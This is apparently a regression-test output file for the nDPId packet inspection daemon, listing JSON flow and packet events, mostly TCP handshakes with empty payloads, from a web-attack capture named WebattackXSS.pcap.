+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347824426,"flow_last_seen":1499347824426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347824426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1499347824426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80mVAAD4G82qsEAABwKgKMoE6AFCPwv7yAAAAAKACchAg8QAAAgQFtAQCCAoBPCyXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":2,"flow_last_seen":1499347824426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgToZT9eBj8L+86AScSAvDQAAAgQFtAQCCAoD5f4MATwslwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":3,"flow_last_seen":1499347824427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347824427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00mZAAD4G83GsEAABwKgKMoE6AFCPwv7zGU\/XgoAQAOXOFAAAAQEICgE8LJcD5f4M"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347825732,"flow_last_seen":1499347825732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347825732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1499347825732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Tq1AAD4GdyOsEAABwKgKMoFIAFDgbWNwAAAAAKACchBqdAAAAgQFtAQCCAoBPC3dAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":2,"flow_last_seen":1499347825732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgUjyJE\/d4G1jcaAScSAmGQAAAgQFtAQCCAoD5f9SATwt3QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":3,"flow_last_seen":1499347825733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347825733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Tq5AAD4GdyqsEAABwKgKMoFIAFDgbWNx8iRP3oAQAOXFHwAAAQEICgE8Ld4D5f9S"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347828369,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347828369,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QFxAAD4GhXSsEAABwKgKMoFiAFAwDnAtAAAAAKACchALaQAAAgQFtAQCCAoBPDBxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7167,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":2,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgWKuqhlpMA5wLqAScSA+aQAAAgQFtAQCCAoD5gHlATwwcQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7168,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":3,"flow_last_seen":1499347828369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QF1AAD4GhXusEAABwKgKMoFiAFAwDnAurqoZaoAQAOXdcAAAAQEICgE8MHED5gHl"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347829667,"flow_last_seen":1499347829667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347829667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1499347829667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lVZAAD4GMHqsEAABwKgKMoFwAFBnlqTjAAAAAKACchCd2AAAAgQFtAQCCAoBPDG1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":2,"flow_last_seen":1499347829667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgXAvgGqdZ5ak5KAScSD9iQAAAgQFtAQCCAoD5gMqATwxtQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":3,"flow_last_seen":1499347829668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347829668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lVdAAD4GMIGsEAABwKgKMoFwAFBnlqTkL4BqnoAQAOWckAAAAQEICgE8MbYD5gMq"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347832201,"flow_last_seen":1499347832201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347832201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1499347832201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Dq9AAD4GtyGsEAABwKgKMoGKAFARZDqAAAAAAKACchBb2gAAAgQFtAQCCAoBPDQvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7201,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":2,"flow_last_seen":1499347832202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgYqpulj1EWQ6gaAScSBQgAAAAgQFtAQCCAoD5gWjATw0LwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":3,"flow_last_seen":1499347832202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347832202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DrBAAD4GtyisEAABwKgKMoGKAFARZDqBqbpY9oAQAOXvhwAAAQEICgE8NC8D5gWj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347833462,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H+JAAD4Gpe6sEAABwKgKMoGYAFAzOSqIAAAAAKACchBItAAAAgQFtAQCCAoBPDVqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":2,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgZimBogRMzkqiaAScSAQtwAAAgQFtAQCCAoD5gbeATw1agEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":3,"flow_last_seen":1499347833462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H+NAAD4GpfWsEAABwKgKMoGYAFAzOSqJpgaIEoAQAOWvvgAAAQEICgE8NWoD5gbe"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347836095,"flow_last_seen":1499347836095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347836095,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1499347836095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z2FAAD4GXm+sEAABwKgKMoGyAFBvhFCdAAAAAKACchDjpwAAAgQFtAQCCAoBPDf8AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":2,"flow_last_seen":1499347836095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgbKB84w4b4RQnqAScSDJAwAAAgQFtAQCCAoD5glxATw3\/AEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":3,"flow_last_seen":1499347836096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347836096,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z2JAAD4GXnasEAABwKgKMoGyAFBvhFCegfOMOYAQAOVoCgAAAQEICgE8N\/0D5glx"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347837373,"flow_last_seen":1499347837373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347837373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1499347837373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zIRAAD4G+UusEAABwKgKMoHAAFDQoPW4AAAAAKACchDcIQAAAgQFtAQCCAoBPDk8AAAAAAEDAwc="} 